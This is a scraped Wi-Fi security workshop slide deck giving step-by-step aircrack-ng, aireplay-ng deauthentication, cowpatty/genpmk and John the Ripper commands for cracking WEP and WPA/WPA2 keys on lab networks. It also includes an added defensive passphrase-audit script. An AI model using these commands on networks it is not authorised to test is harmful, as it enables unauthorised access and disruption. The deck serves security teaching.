![Page 195: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/195.jpg)
Breaking WEP Encryption
• Go back to the first tab and wait until the number in the data column is greater than 50,000
• This number is not fixed, since the attack we are doing is based on statistics.
• Sometimes you can break it with half as many and sometimes you need twice as many or more.
• The length of the key also contributes to the number of IVs that are needed
![Page 196: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/196.jpg)
Breaking WEP Encryption
![Page 197: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/197.jpg)
Breaking WEP Encryption
• Open a new tab in the terminal
![Page 198: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/198.jpg)
Type #aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap
• aircrack-ng– program we are using
• -b 12:18:0a:21:ae:e4– the MAC address of the target Access Point
• acm_wep-01.cap– the file that contains the data captured with airodump-ng
![Page 199: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/199.jpg)
#aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap
![Page 200: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/200.jpg)
#aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If you are not successful wait until the number captured increases to the suggested number and then try again
![Page 201: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/201.jpg)
#aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap
![Page 202: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/202.jpg)
#aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If successful, you will see the previous image.
• Go back to the other two tabs and stop the running programs using ctrl-c
![Page 203: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/203.jpg)
BREAKING WPA&WPA2 ENCRYPTION
![Page 204: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/204.jpg)
Breaking WPA&WPA2 Encryption
• What makes WPA&WPA2 more difficult to break into?
  – larger key
  – does not use RC4
  – uses the network as well as the password to compute the key
![Page 205: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/205.jpg)
Breaking WPA&WPA2 Encryption
• No short cut like in breaking WEP
• Must brute force the key
• Hope that it is a dictionary word or something very simple such as ten numbers
• Three networks set up for breaking into
  – dictionary password
  – 8-char alpha-numeric
  – random
![Page 206: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/206.jpg)
Breaking WPA&WPA2 Encryption
• Process
  – Begin listening to the packets on that network
  – Capture 4-way handshake between AP and client
    • this can be done passively or by deauthentication
  – take that captured handshake and try different sources of passwords to break it
  – wait and see
![Page 207: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/207.jpg)
BREAKING WPA WITH A DICTIONARY LIST
![Page 208: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/208.jpg)
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
![Page 209: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/209.jpg)
#airodump-ng mon0
![Page 210: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/210.jpg)
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
![Page 211: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/211.jpg)
Type #airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• airodump-ng– program we are using
• -c 11– says to listen on channel 11
• --bssid 00:1a:c4:51:3c:31– listen for traffic to and from this Access point
• --w acm_dictionary– file to save the data to
• mon0– interface we are listening on
![Page 212: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/212.jpg)
#airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 213: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/213.jpg)
#airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 214: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/214.jpg)
#airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• The previous image shows connected clients to the specific access point
• At this point you could wait for the handshake to occur or you could force it to occur by means of deauth
![Page 215: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/215.jpg)
Breaking WPA&WPA2 encryption
• Open a new tab in terminal
• This can be done by going to File > New Tab
![Page 216: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/216.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0 – interface we are operating on
• channel– allows us to change the channel
• 11– specific channel we are changing the interface to
![Page 217: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/217.jpg)
#iwconfig mon0 channel 11
![Page 218: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/218.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
![Page 219: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/219.jpg)
#aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0
![Page 220: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/220.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0
![Page 221: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/221.jpg)
Breaking WPA&WPA2 encryption
• Go back to the first tab and you should see an image similar to the following
• The WPA handshake at the top must be there to proceed
![Page 222: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/222.jpg)
#airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 223: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/223.jpg)
Breaking WPA&WPA2 encryption
• Make sure the dictionary files that you downloaded earlier are in the same folder as your .cap files.
• This should be in the root directory
• We will be demonstrating using the english.txt file, however feel free to experiment with the others
![Page 224: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/224.jpg)
Type #aircrack-ng acm_dictionary-01.cap -w english.txt
• aircrack-ng– program we are using to crack the key
• acm_dictionary-01.cap– network capture file with the handshake in it
• -w– indicates that a word list is to be used
• english.txt– the file name containing the wordlist
![Page 225: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/225.jpg)
#aircrack-ng acm_dictionary-01.cap -w english.txt
![Page 226: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/226.jpg)
#aircrack-ng acm_dictionary-01.cap -w english.txt
• If not successful that means that the password was not in that list of words
• You could try using a larger word list or begin brute forcing to break the password
• If successful you should see the following
![Page 227: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/227.jpg)
#aircrack-ng acm_dictionary-01.cap -w english.txt
![Page 228: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/228.jpg)
BREAKING WPA&WPA2 USING A RAINBOW TABLE
![Page 229: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/229.jpg)
What is a Rainbow Table
• pre-computed table of hashed values
• they are built for a specific SSID (network name)
• built using a dictionary or some other source of passwords
• Takes a long time to compute and is a very large file
  – Usually done on a very powerful computer
• The rainbow table can then be used to quickly find a password
![Page 230: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/230.jpg)
Breaking WPA&WPA2 using a Rainbow Table
• Because we already have the handshake, we do not need to re-capture it.
• We will be using the same .cap file as the previous example
![Page 231: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/231.jpg)
Breaking WPA&WPA2 encryption
• Make sure the rainbow table that you downloaded earlier is in the same folder as your .cap files.
• This should be in the root directory
• We will be demonstrating using the acm_dictionary_hash file
• This file was created from the english.txt dictionary file specifically for this SSID
![Page 232: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/232.jpg)
Type #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary
• cowpatty– program we are using
• -r acm_dictionary-01.cap– the file that has the four way handshake in it
• -d acm_dictionary_hash– the file that holds the pre-computed hashes for this specific SSID
• -s acm_dictionary– telling cowpatty what the name of the network is
![Page 233: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/233.jpg)
#cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary
![Page 234: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/234.jpg)
#cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary
• If the password was not in the source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password
• If successful, you will see the following image
![Page 235: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/235.jpg)
#cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary
![Page 236: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/236.jpg)
COMPUTING A PERSONALIZED RAINBOW TABLE
![Page 237: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/237.jpg)
Computing a personalized rainbow table
• As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc
• This is also used when you know the network name in advance and wish to prepare for the attack on the network
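The slides note that the WPA/WPA2 key is computed from the network name as well as the password, and that pre-computed tables are built per SSID and usually only for very common names. The following added example (not part of the original workshop material) shows both points from the network owner's side: it derives the pairwise master key with PBKDF2 to show that the same passphrase gives a different key under a different SSID, and it audits an SSID/passphrase pair for the weaknesses the slides rely on. The finding names, the 60-bit floor and the sample wordlist are assumptions made for this example.

```python
"""WPA/WPA2-PSK configuration audit (added example; lists and thresholds are assumptions)."""
import hashlib
import math
import string

COMMON_SSIDS = {"netgear", "linksys"}  # the two names the slides give; extend as needed
MIN_KEYSPACE_BITS = 60                 # assumed policy floor, not taken from a standard


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace_bits(passphrase):
    """Upper bound on the search space: length * log2(size of the character classes used)."""
    classes = (string.ascii_lowercase, string.ascii_uppercase, string.digits)
    size = sum(len(c) for c in classes if any(ch in c for ch in passphrase))
    if any(ch not in string.ascii_letters + string.digits for ch in passphrase):
        size += 33                     # printable ASCII symbols, space included
    return len(passphrase) * math.log2(size) if size else 0.0


def audit_network(ssid, passphrase, wordlist):
    """Return a list of finding codes; an empty list means none of the checks fired."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("invalid-length")      # WPA passphrases are 8 to 63 characters
    if ssid.lower() in COMMON_SSIDS:
        findings.append("common-ssid")         # pre-computed tables are likely to exist
    if passphrase.lower() in wordlist:
        findings.append("dictionary-word")     # found by any wordlist-based attempt
    if passphrase.isdigit():
        findings.append("digits-only")         # e.g. a ten-digit number
    if keyspace_bits(passphrase) < MIN_KEYSPACE_BITS:
        findings.append("low-keyspace")
    return findings


# Constructed sample data: a tiny wordlist and the kinds of passphrase the slides describe.
SAMPLE_WORDLIST = {"sunshine", "password", "dragon"}
SAMPLE_NETWORKS = [
    ("linksys", "sunshine"),                     # common SSID, dictionary word
    ("acm_dictionary", "0123456789"),            # ten numbers
    ("acm_dictionary", "a1B2c3D4"),              # 8-char alpha-numeric
    ("acm_dictionary", "T7#qLm2!vRx9@pZe4$Ky"),  # long random passphrase
]

if __name__ == "__main__":
    same = wpa_pmk("sunshine", "linksys") == wpa_pmk("sunshine", "acm_dictionary")
    print("same passphrase, different SSID, same PMK?", same)
    for ssid, passphrase in SAMPLE_NETWORKS:
        bits = keyspace_bits(passphrase)
        print(f"{ssid!r}: {bits:.1f} bits, findings={audit_network(ssid, passphrase, SAMPLE_WORDLIST)}")
```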
![Page 238: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/238.jpg)
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
![Page 239: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/239.jpg)
#airodump-ng mon0
![Page 240: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/240.jpg)
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
![Page 241: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/241.jpg)
Type #genpmk -f english.txt -d acm_dictionary_hash -s acm_dictionary
• genpmk– the program we are using
• -f english.txt– the file serving as the source of passwords
• -d acm_dictionary_hash– what the rainbow table should be saved as
• -s acm_dictionary– telling genpmk what the SSID is so that it can be hashed appropriately
![Page 242: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/242.jpg)
#genpmk -f english.txt -d acm_dictionary_hash -s acm_dictionary
![Page 243: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/243.jpg)
#genpmk -f english.txt -d acm_dictionary_hash -s acm_dictionary
![Page 244: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/244.jpg)
BRUTE FORCING A PASSWORD
![Page 245: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/245.jpg)
Brute forcing a password
• This is the most time consuming method, although it is guaranteed to eventually find the password
![Page 246: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/246.jpg)
Brute forcing a password
• As you already have the four-way handshake, we will be moving right into the cracking portion of this example
![Page 247: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/247.jpg)
Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap
• john– program we are using. short for john the ripper
• -stdout– directs standard out to aircrack-ng
• -incremental:all– will increment through all possible passwords
• | aircrack-ng– second program we are running with the input being supplied by john the ripper
• -b 00:1a:c4:51:3c:31– tells aircrack-ng which access point to attack
• -w -– this is where the standard output of john the ripper is going
• acm_dictionary-01.cap– the file containing the four way handshake to be brute forced
![Page 248: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/248.jpg)
Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap
![Page 249: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/249.jpg)
Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap
![Page 250: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/250.jpg)
Brute forcing a password
• The previous slide shows John the Ripper and aircrack-ng being used together
• There are ways to cut down on the number of possible passwords, for example
  – if you know the password is 14 characters, you can have john skip passwords less than and greater than 14 characters.
• This is the longest way to crack a password but also a guaranteed way to do it